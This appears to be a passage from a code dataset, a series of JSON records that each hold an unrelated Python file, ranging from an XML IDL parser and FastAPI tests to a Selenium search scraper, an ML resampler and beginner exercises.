None\n\n def PrepareParsing(self, filename):\n # This is a bit ugly: filename keeps changing during parse\n # IDL meta is not prepared for this (as source is XML and .matter is\n # single file)\n if self._include_meta_data:\n self._idl.parse_file_name = filename\n\n self._context.file_name = filename\n\n def Finish(self) -> Idl:\n self._context.PostProcess(self._idl)\n return self._idl\n\n def startDocument(self):\n if self._include_meta_data and self._locator:\n self._context.locator = self._locator\n self._processing_stack = [ZapXmlHandler(self._context, self._idl)]\n\n def endDocument(self):\n if len(self._processing_stack) != 1:\n raise Exception(\"Unexpected nesting!\")\n\n def startElement(self, name: str, attrs):\n logging.debug(\"ELEMENT START: %r / %r\" % (name, attrs))\n self._context.path.push(name)\n self._processing_stack.append(\n self._processing_stack[-1].GetNextProcessor(name, attrs))\n\n def endElement(self, name: str):\n logging.debug(\"ELEMENT END: %r\" % name)\n\n last = self._processing_stack.pop()\n last.EndProcessing()\n\n # important to pop AFTER processing end to allow processing\n # end to access the current context\n self._context.path.pop()\n\n def characters(self, content):\n self._processing_stack[-1].HandleContent(content)\n\n\n@dataclass\nclass ParseSource:\n \"\"\"Represents an input sopurce for ParseXmls.\n\n Allows for named data sources to be parsed.\n \"\"\"\n source: Union[str, typing.IO] # filename or stream\n # actual filename to use, None if the source is a filename already\n name: Optional[str] = None\n\n @ property\n def source_file_name(self):\n if self.name:\n return self.name\n return self.source # assume string\n\n\ndef ParseXmls(sources: List[ParseSource], include_meta_data=True) -> Idl:\n \"\"\"Parse one or more XML inputs and return the resulting Idl data.\n\n Params:\n sources - what to parse\n include_meta_data - if parsing location data should be included in the Idl\n \"\"\"\n handler = ParseHandler(include_meta_data=include_meta_data)\n\n for source in sources:\n logging.info('Parsing %s...' % source.source_file_name)\n handler.PrepareParsing(source.source_file_name)\n\n parser = xml.sax.make_parser()\n parser.setContentHandler(handler)\n parser.parse(source.source)\n\n return handler.Finish()\n","sub_path":"scripts/py_matter_idl/matter_idl/zapxml/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":4068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"575425280","text":"# coding:utf-8\n'''\njson文件读取\n'''\n\nimport json\nfire_path = r'/Users/xiaohuan/Desktop/face/xiaohuan/python/interface/excel_file/login.json'\n\n\nclass JsonRead():\n def __init__(self, file_name):\n self.file_name = file_name\n\n def get_read(self):\n fp = open(self.file_name, 'r', encoding='utf-8') #单纯打开文件\n json_data = fp.read() #读取文件\n fp.close() #关闭文件\n return json_data\n\nif __name__ == '__main__':\n jp = JsonRead(fire_path)\n result = jp.get_read()\n print(type(result))\n","sub_path":"interface_item/util/json_operate.py","file_name":"json_operate.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"410650576","text":"from objeto import Objeto\n\nclass Mapa(object):\n\tdef __init__(self, ambiente):\n\t\tself.amb = ambiente\n\t\tself.floor, self.wall, self.mapa = self.amb.sprite.Group(), self.amb.sprite.Group(), self.amb.sprite.Group()\n\t\tself.estrutura()\n\t\tself.colisao = []\n\n\tdef estrutura(self):\n\t\tself.fase = [\n\t\t\"WWWWWWWWWWWWWWW\",\n\t\t\"WFWFFFFFFFFFFFW\",\n\t\t\"WFWWWFFFFWWFFFW\",\n\t\t\"WFFFFFFFFFFFWWW\",\n\t\t\"WWWFFFWWFFFFFFW\",\n\t\t\"WFFFFFFFFFFWWFW\",\n\t\t\"WWWWWFFFFFFFFFW\",\n\t\t\"WFFFFFFWWFFFFFW\",\n\t\t\"WFFFWFFFFFFFFFW\",\n\t\t\"WWWWWWWWWWWWWWW\"\n\t\t]\n\n\t\tself.x, self.y = 0, 0\n\n\t\tfor i in range(len(self.fase)):\n\t\t\tfor j in range(len(self.fase[i])):\n\t\t\t\tif self.fase[i][j] == \"W\":\n\t\t\t\t\tsprite = Objeto(self.amb, 'parede64.png', (0,0), (self.x, self.y))\n\t\t\t\t\tself.wall.add(sprite)\n\t\t\t\t\tself.mapa.add(sprite)\n\t\t\t\tif self.fase[i][j] == \"F\":\n\t\t\t\t\tsprite = Objeto(self.amb, 'chao64.png', (0,0), (self.x, self.y))\n\t\t\t\t\tself.floor.add(sprite)\n\t\t\t\t\tself.mapa.add(sprite)\n\t\t\t\tself.x += sprite.get_size()[0]\n\t\t\tself.y += sprite.get_size()[1]\n\t\t\tself.x = 0\n\t\t\t\n\tdef return_colisao(self):\n\t\treturn self.wall","sub_path":"Jogo/mapa.py","file_name":"mapa.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"611457809","text":"\"\"\"Test translated pokemon module\"\"\"\n\nfrom fastapi.testclient import TestClient\n\nfrom app.core import settings\n\n\ndef test_get_translated_pokemon(client: TestClient) -> None:\n response = client.get(f\"{settings.API_V1_STR}/pokemon/translated/mewtwo\")\n pokemon = response.json()\n assert response.status_code == 200\n assert pokemon[\"name\"] == \"mewtwo\"\n\n\ndef test_pokemon_not_found(client: TestClient) -> None:\n response = client.get(f\"{settings.API_V1_STR}/pokemon/translated/asd\")\n pokemon = response.json()\n\n assert response.status_code == 404\n assert pokemon[\"status\"] is False\n\n\ndef test_pokemon_wrong_endpoint(client: TestClient) -> None:\n response = client.get(f\"{settings.API_V1_STR}/pokemon/translated\")\n assert response.status_code == 404\n","sub_path":"tests/apis/v1/handlers/test_translated_pokemon.py","file_name":"test_translated_pokemon.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"378830014","text":"__author__ = 'hee'\n\nimport numpy as np\n\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.svm import SVC\n\nimport supervised_profiler as sp\n\n\ndef get_yj(app_domain, target='gender'):\n yj = sp.Experimenter(sp.YJ_USER_INFO, sp.YJ_INSTALLED_APPS)\n yj_app_incident_dict, yj_app_domain = yj.get_app_incident_dict(app_domain)\n X_yj, categories = sp.get_category_mat(yj_app_incident_dict, app_domain)\n\n yj_profile_ids = np.asarray(yj_app_incident_dict.keys())\n y_yj = yj.get_y(yj_profile_ids, target)\n return X_yj, y_yj, yj_profile_ids\n\n\nif __name__ == '__main__':\n experimenter = sp.Experimenter()\n targets = ('gender', 'job', 'religion', 'marriage', 'income', 'education', 'binned_age', 'hasChild')\n # targets = ('numberOfChildren', '')\n\n app_incident_dict, app_domain = experimenter.get_app_incident_dict(lower=1, upper=80)\n profile_ids = np.asarray(app_incident_dict.keys())\n\n user_category_mat, categories = sp.get_category_mat(app_incident_dict, app_domain)\n X = user_category_mat\n\n y_preds = list()\n for target in targets[:1]:\n y = experimenter.get_y(profile_ids, target)\n clf = LogisticRegression(C=1e2)\n\n # clf = RandomForestClassifier(n_estimators=100)\n # clf = SVC(C=1e2, kernel='linear')\n clf.fit(X, y)\n\n \"\"\"\n y_uniq, y_cnt = np.unique(y, return_counts=True)\n print target, float(np.max(y_cnt)) / np.sum(y_cnt),\n\n np.random.seed(39314)\n avg_acc, std_acc, avg_size, std_size = sp.iterative_kfold_validation_score(clf, X, y)\n print avg_acc, std_acc\n \"\"\"\n\n header = ['profile_id'] + [name for names, y_pred in y_preds for name in names]\n values = np.column_stack([profile_ids] + [tup[1] for tup in y_preds])\n output = np.vstack([header, values])\n \"\"\"\n np.savetxt(sp.DATA_DIR + \"category_pred_proba.csv\", output, fmt='%s', delimiter=',')\n \"\"\"","sub_path":"analyzer/category_based.py","file_name":"category_based.py","file_ext":"py","file_size_in_byte":1956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"322984477","text":"import matplotlib.pyplot as plt\nimport itertools\nimport tensorflow as tf\n\nimport pandas as pd\nfrom scipy import io\nimport numpy as np\nfrom keras.utils import np_utils\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix\nfrom keras.metrics import binary_accuracy\n\nfrom keras import optimizers\nfrom keras.preprocessing.image import ImageDataGenerator\n\nfrom keras_sequential_ascii import sequential_model_to_ascii_printout\n\n# Keras layers\nfrom keras.models import Sequential\nfrom keras.models import load_model\nfrom keras.layers import Dense, Conv2D, Conv1D, MaxPool2D, Flatten\nfrom keras.layers import Dropout, BatchNormalization\n\nimport time\n\nimport sys, string, os, getopt\nimport ctypes as ctypes\n\nimport gc\n\nclass layer_genes_s():\n\n\tnum_layer_genes = 17;\n\n\tdef __init__(self, num_variables = None, layer_genes = None):\n\n\t\tself.layer_genes = layer_genes\n\n\t\tif (not self.testVariableCount(num_variables)):\n\t\t\tprint(\"Error! Class model layer does not have the correct number of variables, exiting!\")\n\t\t\texit(1)\n\t\telse:\n\n\t\t\tself.layer_active = self.layer_genes[ 0]\n\t\t\tself.layer_type = self.layer_genes[ 1] \n\n\t\t\tself.activation_present = self.layer_genes[ 2]\n\t\t\tself.activation_function = self.layer_genes[ 3]\n\n\t\t\tself.num_dense_ans = self.layer_genes[ 4]\n\n\t\t\tself.num_kernals = self.layer_genes[ 5]\n\t\t\tself.kernal_size_x = self.layer_genes[ 6]\n\t\t\tself.kernal_size_y = self.layer_genes[ 7]\n\t\t\tself.kernal_stride = self.layer_genes[ 8]\n\t\t\tself.kernal_dilation = self.layer_genes[ 9]\n\n\t\t\tself.pool_present = self.layer_genes[10]\n\t\t\tself.pool_type = self.layer_genes[11]\n\t\t\tself.pool_size = self.layer_genes[12]\n\t\t\tself.pool_stride = self.layer_genes[13]\n\n\t\t\tself.batch_norm_present = self.layer_genes[14]\n\t\t\tself.dropout_present = self.layer_genes[15]\n\t\t\tself.dropout_value = self.layer_genes[16]\n\n\tdef testVariableCount(self, num_variables):\n\t\treturn_value = 0\n\n\t\tif (num_variables == len(self.layer_genes)):\n\t\t\treturn_value = 1\n\t\n\t\treturn return_value\n\nclass genome_s():\n\n\tdef __init__(self, genome = None):\n\n\t\tself.genome = genome\n\n\t\tself.num_genes = self.genome[0 ]\n\t\tself.num_base_genes = self.genome[1 ]\n\t\tself.num_variables = self.genome[2 ]\n\t\tself.num_layers = self.genome[3 ]\n\n\t\tself.input_vector_num_dimensions = self.genome[4 ]\n\t\tself.input_vector_x_dimensions = self.genome[5 ]\n\t\tself.input_vector_y_dimensions = self.genome[6 ] \n\t\tself.input_vector_z_dimensions = self.genome[7 ]\n\t\tself.output_vector_size = self.genome[8 ]\n\n\t\tself.optimizer_type = self.genome[8 ]\n\t\tself.learning_rate = self.genome[9 ]\n\t\tself.batch_size = self.genome[10 ]\n\n\t\tself.num_epocs = self.genome[11]\n\t\tself.num_semesters = self.genome[12]\n\t\tself.num_generations = self.genome[13]\n\n\t\tself.layer_genes = [[]]*self.num_variables\n\n\t\tfor layer_idx in range(self.num_layers):\n\n\t\t\tgene_index_start = (layer_idx*self.num_variables) + self.num_base_genes\n\t\t\tgene_index_end = gene_index_start + self.num_variables\n\n\t\t\tlayer_genes = self.genome[gene_index_start:gene_index_end]\n\n\t\t\tself.layer_genes = layer_genes_s(num_variables = self.num_variables, layer_genes = layer_genes)\n\n\n\ndef constructModel(genome):\n\n\t#Base Genes:\n\n\tprint('Python Loaded.')\n\n\tgenome = genome_s(genome = genome)\n\n\tprint('Complete.')\n\n","sub_path":"model_generator.py","file_name":"model_generator.py","file_ext":"py","file_size_in_byte":3519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"528807443","text":"import os\nimport shutil\nimport subprocess\nimport sys\n\nfrom cluster.latex_utils import SectionFromJsonHook\nfrom pathlib2 import Path\n\nfrom cluster import cluster_run, execute_submission, update_params_from_cmdline\nfrom cluster.report import produce_basic_report, init_plotting\nfrom cluster.utils import mkdtemp\n\n\ndef find_virtualenv_path():\n proc = subprocess.Popen(\"pipenv --venv\", shell=True, stdout=subprocess.PIPE)\n output = proc.communicate()[0].rstrip().decode(\"utf-8\")\n return os.path.abspath(output)\n\n\nparams = update_params_from_cmdline(verbose=False)\n\njson_full_name = os.path.abspath(sys.argv[1])\n\ninit_plotting()\n\nvirtual_env_path = find_virtualenv_path()\n\nhome = str(Path.home())\nmain_path = mkdtemp(suffix=params.optimization_procedure_name + \"-\" + \"project\")\nresults_path = os.path.join(home, params.results_dir, params.optimization_procedure_name)\njobs_path = mkdtemp(suffix=params.optimization_procedure_name + \"-\" + \"jobs\")\n\ngit_params = dict(\n url=\"git@github.com:a-paulus/exercise2RL.git\", local_path=main_path, **params.git_params\n)\n\nbase_paths_and_files = dict(\n script_to_run=os.path.join(main_path, \"train_racing_cluster.py\"),\n result_dir=results_path,\n jobs_dir=jobs_path,\n virtual_env_path=virtual_env_path,\n)\n\nhyperparam_dict = {hyperparam['name']: hyperparam['values'] for hyperparam in params.hyperparam_list}\n\ndef find_json(df, path_to_results, filename_generator):\n return json_full_name\n\n\njson_hook = SectionFromJsonHook(section_title=\"Optimization setting script\", section_generator=find_json)\n\n\nall_args = dict(submission_name=params.optimization_procedure_name,\n paths=base_paths_and_files,\n submission_requirements=params.cluster_requirements,\n hyperparam_dict=hyperparam_dict,\n other_params=params.fixed_params,\n samples=None,\n restarts_per_setting=params.restarts,\n smart_naming=True,\n git_params=git_params\n )\n\nsubmission = cluster_run(**all_args)\n\ndf, all_params, metrics, submission_hook_stats = execute_submission(submission, base_paths_and_files['result_dir'],\n min_fraction_to_finish=0.0)\ndf.to_csv(os.path.join(base_paths_and_files['result_dir'], 'results_raw.csv'))\n\nrelevant_params = list(hyperparam_dict.keys())\noutput_pdf = os.path.join(base_paths_and_files['result_dir'], f'{params.optimization_procedure_name}_report.pdf')\nproduce_basic_report(df, relevant_params, metrics, submission_hook_stats=submission_hook_stats,\n procedure_name=params.optimization_procedure_name, output_file=output_pdf)\n\n# copy this script to the result dir\nmy_path = os.path.realpath(__file__)\nshutil.copy(my_path, base_paths_and_files['result_dir'])","sub_path":"run_restarts.py","file_name":"run_restarts.py","file_ext":"py","file_size_in_byte":2824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"201374683","text":"from functools import wraps\nimport numpy as np\nimport time\n\n\ndef measure(iterations: int):\n \"\"\"\n wrapper for taking care of the arguments\n \"\"\"\n\n def decorator(f):\n \"\"\"\n actual decorator\n \"\"\"\n f.t = dict()\n f.tp = dict()\n f.num = 0\n\n @wraps(f)\n def wrapper(*args, **kwargs):\n \"\"\"\n wrapper of the decorator\n \"\"\"\n t = time.time()\n tp = time.perf_counter()\n for i in range(iterations):\n r = f(*args, **kwargs)\n f.tp[f.num] = time.perf_counter() - tp\n f.t[f.num] = time.time() - t\n f.num += 1\n return r\n\n return wrapper\n\n return decorator\n\n\n@measure(100)\ndef np_set_difference(a, b):\n return np.setdiff1d(a, b)\n\n\n@measure(100)\ndef set_diff(a: set, b: set):\n return a.difference(b)\n\n\nnp_inputs_a = [np.unique(np.random.randint(0, high=i*2, size=i)).astype(np.uint32) for i in [100, 1000, 10000, 100000]]\nnp_inputs_b = [np.unique(np.random.randint(0, high=i*2, size=i)).astype(np.uint32) for i in [100, 1000, 10000, 100000]]\nset_inputs_a = [set(e) for e in np_inputs_a]\nset_inputs_b = [set(e) for e in np_inputs_b]\n\nfor fnp, fpy in zip([np_set_difference],\n [set_diff]):\n for inpa, inpb, ipya, ipyb in zip(np_inputs_a, np_inputs_b, set_inputs_a, set_inputs_b):\n fnp(inpa, inpb)\n fpy(ipya, ipyb)\n\n print(\"\")\n print(\"{0: <20} |{1: >21}\".format(fnp.__name__, fpy.__name__))\n for idx, data in enumerate(zip(fnp.t.values(), fnp.tp.values(), fpy.t.values(), fpy.tp.values())):\n t_np, tp_np, t_py, tp_py = data\n print(\"{0: <10.5f} {1: <10.5f}|{2:>10.5f} {3:>10.5f}\".format(t_np, tp_np, t_py, tp_py))\n\n","sub_path":"custom_timeit.py","file_name":"custom_timeit.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"478769351","text":"from selenium import webdriver\nfrom webdriver_manager.chrome import ChromeDriverManager\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.common.exceptions import NoSuchElementException\nimport re\n\n\ndef is_exist_by_id(driver, _id):\n try:\n driver.find_element_by_id(_id)\n except NoSuchElementException:\n return False\n return True\n\n\ndef get_google_search_results_link(query, filter_keywords=\"\", max_page=3):\n links = []\n driver = webdriver.Chrome(ChromeDriverManager().install()) # automatically downloads appropriate chromedriver\n driver.get(\"https://www.google.com/search?q=\" + query.replace(\" \", \"+\"))\n repeat_time = 0\n filter_keywords = [keyword.strip() for keyword in filter_keywords.split(',')]\n while True:\n context_element = driver.find_element_by_id(\"rso\")\n elements = context_element.find_elements_by_class_name(\"g\")\n for element in elements:\n element_link = element.find_element_by_tag_name(\"a\").get_attribute(\"href\")\n for keyword in filter_keywords:\n if re.search(r\"%s\" % re.escape(keyword), element_link.lower()):\n # print(\"~~~~~~~~~~~~url '%s' contains keyword '%s'\" % (element_link, keyword))\n links.append(element_link)\n break\n # print(\"url '%s'\" % element_link)\n repeat_time += 1\n if repeat_time == max_page or not is_exist_by_id(driver, \"pnnext\"):\n break\n driver.find_element_by_id(\"pnnext\").click()\n WebDriverWait(driver, 20).until(\n lambda browser: browser.execute_script(\"return document.readyState;\") == \"complete\")\n driver.quit()\n return links\n\n\nif __name__ == \"__main__\":\n get_google_search_results_link(\"pilkada kompas.com 2020\", \"\", 5)\n","sub_path":"src/selenium/google_scraper.py","file_name":"google_scraper.py","file_ext":"py","file_size_in_byte":1809,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"276779569","text":"class resampler:\r\n def __init__(self):\r\n import pandas as pd\r\n from sklearn.preprocessing import LabelEncoder\r\n from collections import Counter\r\n import numpy as np\r\n self.bins = 3\r\n self.pd = pd\r\n self.LabelEncoder = LabelEncoder\r\n self.Counter = Counter\r\n self.X = 0\r\n self.Y_classes = 0\r\n self.target = 0\r\n self.np = np\r\n\r\n # This function adds classes to each sample and returns an augmented dataframe/numpy matrix\r\n def fit(self, X, target, bins=3, balanced_binning=False):\r\n self.bins = bins\r\n tmp = target\r\n \r\n # If data is numpy, then convert it into pandas\r\n if type(target) == int:\r\n if target == -1:\r\n target = X.shape[1]-1\r\n tmp = target\r\n self.X = self.pd.DataFrame()\r\n for i in range(X.shape[1]):\r\n if i!=target:\r\n self.X[str(i)] = X[:,i]\r\n self.X[\"target\"] = X[:,target]\r\n target = \"target\"\r\n else:\r\n self.X = X.copy()\r\n \r\n # Use qcut if balanced binning is required\r\n if balanced_binning:\r\n self.Y_classes = self.pd.qcut(self.X[target], q=self.bins, precision=0)\r\n else:\r\n self.Y_classes = self.pd.cut(self.X[target], bins=self.bins)\r\n \r\n # Pandas outputs ranges after binning. Convert ranges to classes\r\n le = self.LabelEncoder()\r\n self.Y_classes = le.fit_transform(self.Y_classes)\r\n \r\n # Pretty print\r\n print(\"Class Distribution:\\n-------------------\")\r\n classes_count = list(map(list, self.Counter(self.Y_classes).items()))\r\n classes_count = sorted(classes_count, key = lambda x: x[0])\r\n for class_, count in classes_count:\r\n print(str(class_)+\": \"+str(count))\r\n \r\n # Finally concatenate and return as dataframe or numpy\r\n # Based on what type of target was sent\r\n self.X[\"classes\"] = self.Y_classes\r\n if type(tmp) == int:\r\n self.target = tmp\r\n return self.X.values\r\n else:\r\n self.target = target\r\n return self.X\r\n \r\n # This function performs the re-sampling\r\n # It also merges classes as and when required\r\n def resample(self, sampler_obj):\r\n # If classes haven't yet been created, then run the \"fit\" function\r\n if type(self.Y_classes) == int:\r\n print(\"Error! Run fit method first!!\")\r\n return None\r\n\r\n # These are the imblearn parameters that require certain number of samples\r\n # So we need to merge classes having samples less than the value of these hyper-parameters\r\n k_nbs, n_nbs, m_nbs, n_nbs_v3 = 0, 0, 0, 0\r\n params = sampler_obj.get_params()\r\n \r\n if \"k_neighbors\" in params:\r\n k_nbs = params[\"k_neighbors\"]\r\n if \"n_neighbors\" in params:\r\n n_nbs = params[\"n_neighbors\"]\r\n if \"n_neighbors_ver3\" in params:\r\n n_nbs_v3 = params[\"n_neighbors_ver3\"]\r\n if \"m_neighbors\" in params:\r\n m_nbs = params[\"m_neighbors\"]\r\n if \"smote__k_neighbors\" in params:\r\n k_nbs = params[\"smote__k_neighbors\"]\r\n\r\n # Choose the max value\r\n nbs = max([k_nbs, n_nbs, m_nbs, n_nbs_v3])\r\n\r\n # Merge classes if number of neighbours is more than the number of samples\r\n if nbs > 0:\r\n classes_count = list(map(list, self.Counter(self.Y_classes).items()))\r\n classes_count = sorted(classes_count, key = lambda x: x[0])\r\n mid_point = len(classes_count)//2\r\n # Logic for merging\r\n for i in range(len(classes_count)):\r\n if i <= mid_point:\r\n if classes_count[i][1] <= nbs:\r\n self.Y_classes[self.np.where(self.Y_classes == classes_count[i][0])[0]] = classes_count[i+1][0]\r\n print(\"Warning: Class \" + str(classes_count[i][0]) + \" has been merged into Class \" + str(classes_count[i+1][0]) + \" due to low number of samples\")\r\n classes_count[i][0] = classes_count[i+1][0]\r\n else:\r\n if classes_count[i][1] <= nbs:\r\n self.Y_classes[self.np.where(self.Y_classes == classes_count[i][0])[0]] = classes_count[i-1][0]\r\n print(\"Warning: Class \" + str(classes_count[i][0]) + \" has been merged into Class \" + str(classes_count[i-1][0]) + \" due to low number of samples\")\r\n classes_count[i][0] = classes_count[i-1][0]\r\n\r\n # Finally, perform the re-sampling\r\n resampled_data, _ = sampler_obj.fit_resample(self.X, self.Y_classes)\r\n # Drop the extra class\r\n resampled_data.drop([\"classes\"], axis=1, inplace=True)\r\n # Return the correct type\r\n if type(self.target) == int:\r\n return resampled_data.values\r\n else:\r\n return resampled_data\r\n","sub_path":"Regression_ReSampling-master/src/reg_resampler.py","file_name":"reg_resampler.py","file_ext":"py","file_size_in_byte":5024,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"207323720","text":"from django.urls import path\nfrom . import views\n\n\napp_name = 'posts'\n\nurlpatterns = [\n\n #posts_page : post_list\n path('', views.Posts.as_view(), name='posts'),\n path('/', views.PostDetail.as_view(), name='post_detail'),\n\n \n #weather_vote\n path('/sunny/', views.SunnyVote.as_view(), name='Sunny'),\n path('/-sunny/', views.SunnyCancel.as_view(), name='-Sunny'),\n path('/cloudy/', views.CloudyVote.as_view(), name='Cloudy'),\n path('/-cloudy/', views.CloudyCancel.as_view(), name='-Cloudy'),\n path('/rainy/', views.RainyVote.as_view(), name='Rainy'),\n path('/-rainy/', views.RainyCancel.as_view(), name='-Rainy'),\n \n #comment\n path('/comments/', views.CommentOnPost.as_view(), name='comment_post'),\n path('comments//', views.CommentDelete.as_view(), name='comment_delete'),\n path('/comments//', views.ModerateComments.as_view(), name='moderate_comments'),\n path('comments//likes/', views.LikeComment.as_view(), name='like_comment'),\n path('comments//unlikes/', views.UnlikeComment.as_view(), name='unlike_comment'),\n\n\n #Search\n path('search/', views.Search.as_view(), name='search'),\n\n\n]","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"399642647","text":"import torch.nn as nn\nimport torch.nn.functional as F\n\nfrom slimcut import utils\n\nfrom . import SyllableBaseModel\nclass Model(SyllableBaseModel):\n def __init__(self, data_config, model_config=\"emb:32|l1:64\"):\n super(Model, self).__init__()\n \n window_size = data_config['window_size']\n no_vocabs = data_config['num_tokens']\n\n config = utils.parse_model_params(model_config)\n emb_dim = config['emb']\n l1 = config['l1']\n\n self.embeddings = nn.Embedding(\n no_vocabs,\n emb_dim,\n padding_idx=0\n )\n\n self.linear1 = nn.Linear((2*window_size+1)*emb_dim, l1)\n self.linear2 = nn.Linear(l1, 1)\n\n self.model_params = model_config\n\n def forward(self, inputs):\n embeds = self.embeddings(inputs).view(inputs.size()[0], -1)\n out = F.relu(self.linear1(embeds))\n out = self.linear2(out)\n return out","sub_path":"attacut/models/old_models/simple_nn.py","file_name":"simple_nn.py","file_ext":"py","file_size_in_byte":930,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"455522823","text":"'''\nTime Complexity: O(n)\nSpace Complexity: O(n)\nDid this code successfully run on Leetcode : Yes\nExplanation: Iterate through the tree until you reach the leaf node, while iterating through till the leaf create the\nnumber. Once you reach the leaf node add the number to the variable sum. Do this for left and right, return sum\n'''\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution:\n def __init__(self):\n self.sum = 0\n\n def helper(self, root: TreeNode, sum1: int, val: int) -> int:\n if root == None:\n self.sum = self.sum + 0\n return\n\n if root.left == None and root.right == None:\n self.sum = self.sum + ((val * 10) + root.val)\n else:\n self.helper(root.left, self.sum, (val * 10) + root.val)\n self.helper(root.right, self.sum, (val * 10) + root.val)\n\n def sumNumbers(self, root: TreeNode) -> int:\n result = 0\n self.helper(root, result, 0)\n return self.sum\n","sub_path":"problem2.py","file_name":"problem2.py","file_ext":"py","file_size_in_byte":1097,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"495551784","text":"# Copyright 2014, UFCG/Analytics\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\n\nclass RecommendationUpgrade:\n\n def __init__(self, host,\n cpu_total, cpu_usage,\n cpu_p, mem_total,\n mem_usage, mem_p,\n disk_total, disk_usage,\n disk_p):\n self.host = host\n self.cpu_total = cpu_total\n self.cpu_usage = cpu_usage\n self.cpu_percentage = cpu_p\n self.memory_total = mem_total\n self.memory_usage = mem_usage\n self.memory_percentage = mem_p\n self.disk_total = disk_total\n self.disk_usage = disk_usage\n self.disk_percentage = disk_p\n\n\nclass AlarmsList:\n\n def __init__(self, alarm_id, alarm_name, enabled, description):\n self.alarm_id = alarm_id\n self.alarm_name = alarm_name\n self.enabled = enabled\n self.description = description\n\n\nclass AlarmsHistory:\n\n def __init__(self, timestamp, alarm_name, resource_id, detail):\n self.timestamp = timestamp\n self.alarm_name = alarm_name\n self.resource_id = resource_id\n self.detail = detail\n\n\nclass RecommendationFlavors:\n\n def __init__(self, name, sugestion, lose, violations):\n self.name = name\n self.sugestion = sugestion\n self.lose = lose\n self.violations = violations\n\n\nclass RecommendationPowerStatus:\n\n def __init__(self, host, status):\n self.host = host\n self.status = status\n\n\nclass RecommendationMigration:\n\n def __init__(self, host, server, name, endhost, project):\n self.host = host\n self.server = server\n self.name = name\n self.endhost = endhost\n self.project = project\n\n\nclass BenchmarkDisk:\n\n def __init__(self, host, avg,\n median, min, max,\n first, second, third, fourth):\n self.host = host\n self.avg = avg\n self.median = median\n self.min = min\n self.max = max\n self.first = first\n self.second = second\n self.third = third\n self.fourth = fourth\n\n\nclass BenchmarkCpu:\n\n def __init__(self, host, avg,\n median, min, max,\n first, second, third, fourth):\n self.host = host\n self.avg = avg\n self.median = median\n self.min = min\n self.max = max\n self.first = first\n self.second = second\n self.third = third\n self.fourth = fourth\n\n\nclass BenchmarkMemory:\n\n def __init__(self, host, avg,\n median, min, max,\n first, second, third, fourth):\n self.host = host\n self.avg = avg\n self.median = median\n self.min = min\n self.max = max\n self.first = first\n self.second = second\n self.third = third\n self.fourth = fourth\n\n\nclass UserMessages:\n\n def __init__(self, id, sender,\n subject, timestamp,\n message, read):\n self.id = id\n self.sender = sender\n self.subject = subject\n self.timestamp = timestamp\n self.message = message\n self.read = read\n\n\nclass HostMessages:\n\n def __init__(self, id, zone):\n self.id = id\n self.zone = zone\n\n\nclass SentMessages:\n\n def __init__(self, message_id, subject, sent_to, read):\n self.message_id = message_id\n self.subject = subject\n self.sent_to = sent_to\n self.read = read\n","sub_path":"telemetry_dashboard/api/telemetry.py","file_name":"telemetry.py","file_ext":"py","file_size_in_byte":3981,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"340774697","text":"__author__ = 'hoo'\nimport matplotlib.pyplot as plt\nimport pandas as pd\ndf = pd.read_excel(\"first.xlsx\",\"Sheet1\")\nfig = plt.figure()\nax = fig.add_subplot(1,1,1)\nax.hist(df['Age'],bins = 7)\nplt.title(\"Age distribution\")\nplt.xlabel('Age')\nplt.ylabel('#Emloyee')\nplt.show()","sub_path":"twoFirst01/qtgui4/pydatavisual/visual001.py","file_name":"visual001.py","file_ext":"py","file_size_in_byte":269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"586413610","text":"# print, len, str, format, int, input, range, enumerate\n\na = 'Olá global!'\ndef qualquer_coisa():\n a += ' Hum...'\n print(a)\n\nqualquer_coisa()\nprint(a)\n\nexit()\ndef square(n):\n return n**2\n\ndef par_impar(n):\n if n % 2 == 0:\n print('par')\n else:\n print('impar')\n\nfor i in range(0, 10):\n par_impar(i)\n\ndef reverse(i):\n return i[::-1]\n\nletras = ['a', 'b', 'c', 'd', 